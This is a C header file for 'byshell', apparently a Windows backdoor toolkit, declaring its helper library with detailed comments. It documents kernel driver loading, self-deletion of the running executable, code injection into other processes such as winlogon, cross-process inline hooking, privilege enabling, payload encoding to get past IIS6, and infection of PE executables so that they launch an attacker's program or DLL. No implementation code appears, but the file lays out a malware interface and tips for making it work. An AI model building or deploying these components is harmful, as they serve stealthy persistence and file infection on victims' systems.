/////////////////////////////////////////////////////////////////
// usrlib.h -- prototypes for byshell's user-mode helper library
// (driver loading, resource extraction, cross-process code injection and
// hooking, privilege handling, PE infection).  Each section banner names
// the .cpp/.c file that implements it.
// NOTE(review): no include guard is visible here, and the Win32 types used
// below (DWORD, BOOL, HMODULE, UCHAR, ULONG, BYTE, IN/OUT/OPTIONAL) are not
// defined in this file -- windows.h must be included first and this header
// included only once per translation unit.
/////////////////////////////////////////////////////////////////
// drvldr.cpp
// Dec 16 2005
// Kernel-driver loader helpers.  Each returns a DWORD status; the
// "non-zero means failure" convention stated for suicide_bat below
// presumably applies here as well -- confirm against drvldr.cpp.
DWORD drvldr_reg(char* drvname,DWORD start_type,char* path);
// Register a driver service named 'drvname' with the given start type
// (presumably a SERVICE_*_START value -- verify in drvldr.cpp).
// 'path' must be an NT-native path of the form \??\C:\dir\file.sys;
// a plain Win32 "C:\..." path is not accepted as-is.
DWORD drvldr_load(char* drvname);
// Load (start) the driver service registered as 'drvname'.
DWORD drvldr_stop(char* drvname);
// Stop the running driver service 'drvname'.
DWORD drvldr_dereg(char* drvname);
// Remove the service entry created by drvldr_reg.
BOOL piLoadDriverPrivilege(BOOL bEnable);
// Enable (TRUE) or disable (FALSE) the privilege needed to load a driver
// in the current process token (presumably SeLoadDriverPrivilege; the
// generic helper is EnableSpecificPrivilege in privilege.cpp).  Call it
// before drvldr_load; Windows can only enable privileges the token already
// holds, so an unprivileged caller still fails.
//////////////////////////////////////////////////////////////////
// rs.cpp
// Dec 26 05
// Aug 1 06: fixed the FindResource module-handle bug -- passing 0 as the
// module handle only finds resources in the .exe, never in a dll.  Always
// pass the real HMODULE of the image that carries the resource.
BOOL __stdcall release_rs_file(HMODULE module_base,char* rs_name,char* rs_type,char* filepath);
// Extract the resource identified by rs_name / rs_type (as FindResource
// takes them) from the image 'module_base' and write it to 'filepath'.
// BOOL return: TRUE on success (presumably).
// NOTE(review): 'filepath' is used as given; the caller must choose a
// location another local user cannot pre-create or swap underneath us.
// March 14 2006
// Used by the byshell v1.00 loader's parameter configurer.
BOOL __stdcall config_exefile_addtail(char* filepath,char* param,ULONG param_len);
// Append 'param_len' bytes from 'param' to the end of the file 'filepath'
// (a loader .exe) so the loader can read its configuration back at run time.
BOOL __stdcall read_config_addtail(char* param,ULONG param_len);
// Counterpart of config_exefile_addtail: read 'param_len' bytes of trailing
// configuration into 'param' (presumably from the running image's own file
// -- confirm in rs.cpp).  'param' must hold param_len bytes.  Nothing in
// this interface tells the reader how much was appended, so unless rs.cpp
// stores a length marker both sides must agree on param_len exactly, or
// the result is garbage.
///////////////////////////////////////////////////////////////////
// suicide.cpp
// Dec 26 2005
DWORD __stdcall suicide_bat(char* tmpbatname);
// Self-delete: write a batch script to 'tmpbatname' that terminates this
// process and then deletes its executable file, and hand off to it.
// A non-zero return is an error code and means the cleanup did not happen.
// NOTE(review): the script path is caller-chosen; a predictable name in a
// world-writable directory can be pre-created or replaced by another local
// user before it runs, so use a private, unpredictable path.
///////////////////////////////////////////////////////////////////
// remotecode.cpp
// Dec 27-30 2005 for byshell v1.00
// Three ways to run a caller-supplied code blob inside another process.
// Common contract: 'code' (codesize bytes) and 'paramblock'
// (paramblocksize bytes) are copied into process 'pid', so 'code' must be
// hand-written, position-independent (self-relocating) asm that touches
// nothing from our address space except what is inside the copied
// paramblock.  The caller needs sufficient access to open 'pid' (see
// piDebugPrivilege in privilege.cpp).
DWORD __stdcall remotecode_hook(DWORD pid, void (__stdcall *code)(void*,char*),
void* paramblock,int codesize,int paramblocksize);
// Hook ZwWaitForSingleObject, ZwWaitForMultipleObjects, ZwDelayExecution
// and ZwYieldExecution in the target so that 'code' runs exactly once, on
// one of the target's own threads, the next time one of them is called.
// No new thread is created.
// 'code' has the signature void __stdcall code(void* param, char* event):
// param is the copied paramblock; event names the event the code may signal
// when it is done (optional).
// LIMITATION: the hook only fires on a fresh call, so a process already
// parked in a wait (an idle winlogon, for example) never runs the code.
// Dec 30
DWORD __stdcall remotecode_CreateRemoteThread(DWORD pid, void (__stdcall *code)(void*),
void* paramblock,int codesize,int paramblocksize);
// Run 'code' on a new thread created in the target process; 'code'
// receives the copied paramblock as its only argument.
// Jan 1-2 2006
DWORD __stdcall remotecode_userAPC(DWORD pid, void (__stdcall *code)(void*,void*,void*),
void* paramblock,int codesize,int paramblocksize);
// Deliver 'code' as a user-mode APC in the target.  It may run SEVERAL
// TIMES (presumably once per thread it is queued to), so the code must
// serialize itself -- e.g. with a named mutex -- if it must execute once.
// 'code' has the APC signature
// VOID (NTAPI *)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);
// only Argument1 (the copied paramblock) is meaningful, the other two are 0.
// KNOWN BUG (Jan 12 2006): a thread sitting in an alertable wait resumes
// abnormally after the APC, which can crash the target -- winlogon
// included, and a crash there typically takes the logon session or the
// machine down with it.  Treat this function as unstable; the
// CreateRemoteThread variant above carries no such caveat.
// The technique was adapted from a published write-up (by PJF) that had
// evidently not been tested enough.
/////////////////////////////////////////////////////////////////////
// udetour.c
// Dec 27-29 2005 for byshell v1.00
// udetour: derived from kdetourex (Dec 27-28 2005), the kernel-mode detour.
// The original Hookstru call-transfer mechanism cannot be reused because
// the hooked function executes in ANOTHER process: the hook is laid out
// across mappings, relocations and pointers that must be valid in the
// target's address space, not ours.  Treat this code as fragile and test
// every change against a real target.
// Handle describing one installed hook.  Allocated by udetour, released
// (after restoring the target) by uundetour.
typedef struct u_hookstru{
DWORD pid;       // process the hook was installed in
int totallen;    // bytes overwritten at the hooked entry (presumably <= 16; see ori)
UCHAR ori[16];   // original bytes displaced from the target, kept for restore
UCHAR* realaddr; // patched address in the target's address space -- confirm in udetour.c
} U_hookstru,*pU_hookstru;
pU_hookstru __stdcall udetour(UCHAR* target,DWORD pid,
UCHAR* hooker_selfreloc_codeblock,int blocklen,
int transfering_area_offset,int code_entry_offset
);
// Install an inline hook on function 'target' in process 'pid' (our own
// process or another one).
//   hooker_selfreloc_codeblock / blocklen: the replacement code, copied into
//     the target.  Must be hand-written, position-independent asm with the
//     same prototype and calling convention as the hooked function.
//   transfering_area_offset: offset inside the block of a scratch area of
//     at least 16+5 NOP bytes.  udetour fills it with the original bytes
//     displaced from 'target' (up to 16) followed by a 5-byte jmp back into
//     the original function, so the hook can "call" this area to reach the
//     original.  Unlike kdetour there is no pHookstruex->oritocall(...) to
//     call; the area is the only way through.
//   code_entry_offset: offset inside the block of the hook's real entry.
// Returns a callee-allocated U_hookstru describing the hook, or 0 on failure.
// Pitfall: pass the address of the actual code bytes.  In VC builds a
// function name may resolve to an incremental-link "jmp realaddr" thunk;
// copying that thunk instead of the body installs a hook that jumps into
// OUR address space, which is meaningless inside the target.
DWORD __stdcall uundetour(pU_hookstru phk);
// Restore the original bytes at the hooked target and free the U_hookstru.
// Every successful udetour must be undone this way; if the hooking process
// exits first, the patch stays in the target with nothing left to restore
// it from.
/////////////////////////////////////////////////////////////////////
// suspend.cpp
// Dec 27-29 2005
DWORD suspend_process(DWORD pid);
// Suspend every thread of process 'pid' except the calling thread (so it
// is safe to use on our own process).  Returns a DWORD status (presumably
// 0 on success -- confirm in suspend.cpp).  Threads the target creates
// after this call are presumably not covered.
DWORD resume_process(DWORD pid);
// Decrement the suspend count of every thread of 'pid' (except the calling
// thread) by exactly one.  Pair 1:1 with suspend_process: a thread
// suspended twice is still suspended after a single resume.
/////////////////////////////////////////////////////////////////////
// privilege.cpp
// Dec 27 2005
BOOL piDebugPrivilege(BOOL bEnable);
// Enable (TRUE) / disable (FALSE) the debug privilege (presumably
// SeDebugPrivilege) in the current process token; typically required
// before opening system processes such as winlogon for injection.
// Returns TRUE on success.
// Jan 4 2005 (sic -- from the section order this is almost certainly 2006)
// Enable a specific privilege.
BOOL EnableSpecificPrivilege(BOOL bEnable,char* Name);
// Enable/disable the privilege called 'Name' (an "SeXxxPrivilege" string,
// presumably as accepted by LookupPrivilegeValue) in the current process
// token.  Returns TRUE on success.
// Jan 4 2005 (sic)
// Enable every privilege; returns the number successfully enabled.
DWORD EnableAllPrivilege(BOOL bEnable);
// Enable/disable every privilege present in the current process token and
// return how many were successfully toggled.  Windows only lets a process
// enable privileges its token already holds -- this grants nothing new.
// NOTE(review): prefer EnableSpecificPrivilege for the one or two
// privileges a caller actually needs rather than enabling everything.
/////////////////////////////////////////////////////////////////////
// utility.cpp
// Dec 30 2005
DWORD findprocess(char* exename);
// Look up a running process by image name and return its pid (presumably
// 0 when nothing matches -- confirm in utility.cpp).  Image names are not
// unique; which instance is returned when several exist is unspecified.
// Taken from magic_qutoes_asp (May 31 2005, byshell 0.67 beta2) and added
// to usrlib.
void* __stdcall memmem(const void *buf, const void *childbuf,
unsigned int count ,unsigned int childcount);
// Find the first occurrence of the childcount-byte block 'childbuf' inside
// the count-byte block 'buf'.  Returns a pointer into buf (presumably NULL
// when not found).
// NOTE(review): this is NOT the POSIX/glibc memmem(): the argument order
// differs (haystack, needle, haystack_len, needle_len here versus
// haystack, haystack_len, needle, needle_len there) and the lengths are
// unsigned int rather than size_t.  Do not mix the two, and do not let this
// declaration collide with a libc memmem on non-MSVC builds.
// June 2nd, 2005
// Added with byshell 0.67 beta2 to get payloads through IIS6.
void ABC2bin(BYTE* ABC,BYTE* bin,int ABClen);
void bin2ABC(BYTE* ABC,BYTE* bin,int binlen);
// Transcode between raw bytes ('bin') and a printable alphabetic
// representation ('ABC').  ABClen / binlen is the length of the INPUT
// side; the caller supplies both buffers and must size the output for the
// expansion, whose ratio is not stated here -- confirm in utility.cpp
// before sizing.
// Dec 30 2005
void gen_special_namestring(char* prefix,int len,char* output);
// Generate a GUID-like identifier such as BYEVENT0897654321: 'prefix'
// followed by digits, 'len' characters in total (at most 32).  'len' does
// not count the terminating NUL, so 'output' must hold len+1 bytes.
// Jan 5 2006
bool split_filename_str(IN char* str,IN int isbeginning_a_name,IN int namenum,IN OUT char** names);
// Split a command-line style string into 'namenum' path names, honouring
// quotes so that e.g. "c:\a and b\1.txt" d:\2.txt yields two names -- the
// C runtime's format parsing cannot do this.  Each substring is copied into
// the caller-provided buffers names[0..namenum-1].  isbeginning_a_name
// presumably says whether 'str' starts directly with a name or with
// leading material to skip -- confirm in utility.cpp.
// NOTE(review): the buffers in 'names' carry no size; since every name is
// a substring of 'str', sizing each at strlen(str)+1 is the safe bound.
///////////////////////////////////////////////////////////////////
/*//self-reloc.cpp
//These routines are position-independent helpers and must live in the
//relocatable code area (presumably the injected self-relocating code), so
//they are NOT declared or linked from here.  Kept only as a record of their
//contracts.
//Dec 30
DWORD __stdcall searchexport(DWORD modbase,DWORD szexportname);
//Copied from the very early 'searchaddr' test in 'PEinfect': self-relocating,
//case-sensitive export-name lookup in the module at modbase.
//Dec 30-31
void* __stdcall searchmod(char* modname);
//Self-relocating raw-memory search for a loaded module by name,
//copied from the very early 'searchaddr' test in 'PEinfect'.
//Known to fail inside kmodexp because its SEH handling is broken.
int __stdcall mystrincmp(char* s1,char* s2,int len);
*/
/////////////////////////////////////////////////////////////////////
// dllrtl.cpp
// Jan 5 2006
void dll_exit_clean(char* fullpath,int is_delfile);
// Tear a DLL down from inside one of its own threads: end the calling
// thread, FreeLibrary the module loaded from 'fullpath', and if is_delfile
// is non-zero also delete that file from disk.  Because it unloads the code
// it is running from, it presumably never returns -- make it the last call.
/////////////////////////////////////////////////////////////////////
// PEinfect.cpp
// Feb 12-14 2006, based on the Jan 16 2005 'infect' code.
// Feb 13: all three options tested successfully, but the export-search
// code is too large to inject comfortably.
// Feb 14: rewrote the self-relocating runtime and the thunk code.
BOOL PE_thunk_infect(char* target_file,
char* OPTIONAL run_exe,char* OPTIONAL load_dll,
UCHAR* OPTIONAL custom_inject_code,int OPTIONAL len_custom_inject_code,
int OPTIONAL jmpstub_offset_custom_inject_code);
// Infect a PE file by inserting a thunk that runs before the original
// entry point.  Exactly ONE of the three payload options may be given; the
// others must be NULL/0.  A file can be infected again and again until its
// spare (slack) space is exhausted.
//   target_file   file to modify (presumably rewritten in place -- back it
//                 up first).
//   run_exe       name of an executable the thunk launches.
//   load_dll      name of a DLL the thunk loads.
//   custom_inject_code / len_custom_inject_code
//                 caller-supplied thunk code, copied into the file.
//   jmpstub_offset_custom_inject_code
//                 offset inside custom_inject_code of a 5-byte
//                 "E9 00 00 00 00" jmp stub; the infector patches its rel32
//                 (presumably to chain to the original entry point --
//                 confirm in PEinfect.cpp).
// Returns TRUE on success.
// Feb 14 2006
int is_my_PE_thunk_infect(char* target_file);
// Detect a previous PE_thunk_infect on 'target_file' by checking the marker
// it leaves in the DOS header's reserved bytes at offset 0x1c (e_res).
// Returns 1 if infected, 0 if not, -1 on error.  Note this is a fixed,
// easily recognizable signature.
// Feb 26 2006
BOOL is_PE_common(char* target_file);
// Heuristic check that 'target_file' is an ordinary PE image -- not packed,
// encrypted or otherwise protected.  PE_thunk_infect on such a file yields
// a crashing binary, so call this first and refuse to infect when it
// returns FALSE.